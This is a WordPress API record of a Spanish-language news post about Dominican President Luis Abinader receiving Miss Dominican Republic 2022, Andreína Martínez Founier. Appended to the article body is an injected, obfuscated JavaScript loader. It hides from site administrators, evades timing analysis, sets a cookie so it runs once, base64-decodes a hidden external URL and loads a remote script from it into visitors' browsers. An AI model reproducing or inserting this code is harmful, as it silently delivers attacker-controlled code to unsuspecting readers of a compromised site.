{"id":13489,"date":"2023-01-20T08:29:47","date_gmt":"2023-01-20T12:29:47","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=13489"},"modified":"2023-01-20T08:29:47","modified_gmt":"2023-01-20T12:29:47","slug":"presidente-abinader-recibe-visita-de-cortesia-de-la-miss-republica-dominicana-andreina-martinez","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=13489","title":{"rendered":"Presidente Abinader recibe visita de cortes\u00eda de la Miss Rep\u00fablica Dominicana, Andre\u00edna Mart\u00ednez"},"content":{"rendered":"<p>Santo Domingo. &#8211; <strong>El Presidente Luis Abinader,<\/strong>\u00a0<strong>acompa\u00f1ado de la primera dama de la Rep\u00fablica, Raquel Arbaje<\/strong>, recibi\u00f3 este jueves en su despacho una visita de cortes\u00eda de la\u00a0<strong>Miss Rep\u00fablica Dominicana 2022, Andre\u00edna Mart\u00ednez Founier<\/strong>, que particip\u00f3 en la edici\u00f3n 71 de Miss Universo celebrada en New Orleans, Estados Unidos.<\/p>\n<p>Mart\u00ednez Founier lleg\u00f3 acompa\u00f1ada al Palacio Nacional de\u00a0<strong>Magali Febles, directora de Miss Universo Rep\u00fablica Dominicana<\/strong>.<\/p>\n<p>En el encuentro particip\u00f3 tambi\u00e9n el\u00a0<strong>Ministro Administrativo de la Presidencia, Jos\u00e9 Ignacio Paliza<\/strong>, seg\u00fan una nota de la Direcci\u00f3n de Prensa del Presidente.<\/p>\n<p>La belleza dominicana qued\u00f3 como segunda finalista y top 3 en este concurso, donde la representante de Estados Unidos,\u00a0<strong>R\u2019Bonney Gabriel<\/strong>, se llev\u00f3 el premio de Miss Universo 2023.\u00a0<strong>La venezolana Amanda Dudamel<\/strong>\u00a0qued\u00f3 en segundo lugar del evento.<\/p>\n<p><strong>Sobre Miss Universo<\/strong><\/p>\n<p>Miss Universo es un t\u00edtulo y un concurso de belleza femenina internacional anual que busca la belleza integral, el liderazgo, la elegancia, la personalidad, el porte, la pose, la comunicaci\u00f3n, la seguridad, y el activismo social en\u00a0<strong>candidatas provenientes de diferentes pa\u00edses del mundo (independientes o aut\u00f3nomos)<\/strong>. Las candidatas son enviadas por franquicias locales para representar \u00fanicamente a dicho territorio.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Santo Domingo. &#8211; El Presidente Luis Abinader,\u00a0acompa\u00f1ado de la primera dama de la Rep\u00fablica, Raquel Arbaje, recibi\u00f3 este jueves en su despacho una visita de cortes\u00eda de la\u00a0Miss Rep\u00fablica Dominicana 2022, Andre\u00edna Mart\u00ednez Founier, que particip\u00f3 en la edici\u00f3n 71 de Miss Universo celebrada en New Orleans, Estados Unidos. Mart\u00ednez Founier lleg\u00f3 acompa\u00f1ada al Palacio [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":13491,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-13489","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13489","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13489"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/13489\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/13491"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13489"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13489"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13489"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}